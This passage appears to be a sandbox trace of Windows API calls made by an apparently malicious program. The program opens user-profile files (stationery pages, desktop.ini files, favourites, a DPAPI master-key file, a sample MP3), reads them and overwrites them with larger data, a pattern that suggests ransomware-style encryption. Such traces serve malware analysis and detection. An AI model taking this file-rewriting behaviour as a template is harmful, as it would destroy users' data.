lpUsedDefaultChar=0x0) returned 55 [0165.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96a44, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0165.048] ReadFile (in: hFile=0x130, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6c8, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2b1f2bc*=0x6c8, lpOverlapped=0x0) returned 1 [0165.050] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.050] WriteFile (in: hFile=0x130, lpBuffer=0x25ae208*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ae208*, lpNumberOfBytesWritten=0x2b1f2d0*=0xc50, lpOverlapped=0x0) returned 1 [0165.051] CloseHandle (hObject=0x130) returned 1 [0165.051] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.052] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.053] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe7 [0165.053] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.053] ReleaseMutex (hMutex=0x168) returned 1 [0165.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.htm", lpUsedDefaultChar=0x0) returned 10 [0165.054] ReadFile (in: hFile=0x130, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x2b1f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0165.055] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.055] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0165.056] CloseHandle (hObject=0x130) returned 1 [0165.057] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe6 [0165.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.058] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.058] ReleaseMutex (hMutex=0x168) returned 1 [0165.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0165.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.htm", lpUsedDefaultChar=0x0) returned 9 [0165.059] ReadFile (in: hFile=0x130, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x2b1f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0165.060] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.060] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0165.061] CloseHandle (hObject=0x130) returned 1 [0165.062] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.064] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.065] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1d4 [0165.065] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.065] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.065] ReleaseMutex (hMutex=0x168) returned 1 [0165.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0165.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpUsedDefaultChar=0x0) returned 36 [0165.066] ReadFile (in: hFile=0x130, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0165.067] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.067] WriteFile (in: hFile=0x130, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0165.068] CloseHandle (hObject=0x130) returned 1 [0165.068] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.070] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.070] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x50 [0165.070] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.071] ReleaseMutex (hMutex=0x168) returned 1 [0165.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0165.071] ReadFile (in: hFile=0x130, lpBuffer=0x1f9fe28, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fe28*, lpNumberOfBytesRead=0x2b1f2bc*=0x50, lpOverlapped=0x0) returned 1 [0165.072] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.072] WriteFile (in: hFile=0x130, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5d8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d8, lpOverlapped=0x0) returned 1 [0165.073] CloseHandle (hObject=0x130) returned 1 [0165.073] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.351] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.351] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x85 [0165.352] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.352] ReleaseMutex (hMutex=0x168) returned 1 [0165.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Entertainment.url", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Entertainment.url", lpUsedDefaultChar=0x0) returned 21 [0165.352] ReadFile (in: hFile=0x130, lpBuffer=0x2673930, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673930*, lpNumberOfBytesRead=0x2b1f2bc*=0x85, lpOverlapped=0x0) returned 1 [0165.354] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.354] WriteFile (in: hFile=0x130, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0165.354] CloseHandle (hObject=0x130) returned 1 [0165.355] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.357] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.358] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x85 [0165.358] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.358] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.358] ReleaseMutex (hMutex=0x168) returned 1 [0165.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Spaces.url", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0165.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Spaces.url", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Spaces.url", lpUsedDefaultChar=0x0) returned 23 [0165.358] ReadFile (in: hFile=0x130, lpBuffer=0x2673930, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673930*, lpNumberOfBytesRead=0x2b1f2bc*=0x85, lpOverlapped=0x0) returned 1 [0165.360] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.360] WriteFile (in: hFile=0x130, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0165.360] CloseHandle (hObject=0x130) returned 1 [0165.360] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.362] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.362] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x11a [0165.362] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.362] ReleaseMutex (hMutex=0x168) returned 1 [0165.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0165.363] ReadFile (in: hFile=0x130, lpBuffer=0x1ecd5c8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecd5c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x11a, lpOverlapped=0x0) returned 1 [0165.364] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.364] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0165.364] CloseHandle (hObject=0x130) returned 1 [0165.364] CreateFileW (lpFileName="C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.365] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.365] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xae [0165.365] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.365] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.365] ReleaseMutex (hMutex=0x168) returned 1 [0165.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0165.366] ReadFile (in: hFile=0x130, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x2b1f2bc*=0xae, lpOverlapped=0x0) returned 1 [0165.367] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0165.367] WriteFile (in: hFile=0x130, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x636, lpOverlapped=0x0) returned 1 [0165.367] CloseHandle (hObject=0x130) returned 1 [0165.367] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.369] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.369] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3ec5d2 [0165.369] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.369] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.369] ReleaseMutex (hMutex=0x168) returned 1 [0165.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maid with the Flaxen Hair.mp3", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0165.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maid with the Flaxen Hair.mp3", cchWideChar=29, lpMultiByteStr=0x1f8fc6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maid with the Flaxen Hair.mp3", lpUsedDefaultChar=0x0) returned 29 [0165.369] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0165.372] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0165.390] ReadFile (in: hFile=0x130, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0165.392] SetFilePointer (in: hFile=0x130, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3ea5d2 [0165.392] ReadFile (in: hFile=0x130, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0165.397] SetFilePointer (in: hFile=0x130, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3ea5d2 [0165.399] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x2588, lpOverlapped=0x0) returned 1 [0165.399] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0165.399] WriteFile (in: hFile=0x130, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0165.400] WriteFile (in: hFile=0x130, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0165.400] WriteFile (in: hFile=0x130, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2b1f28c*=0x2000, lpOverlapped=0x0) returned 1 [0165.400] CloseHandle (hObject=0x130) returned 1 [0165.401] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.402] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.402] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x146 [0165.402] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0165.403] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.403] ReleaseMutex (hMutex=0x168) returned 1 [0165.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", 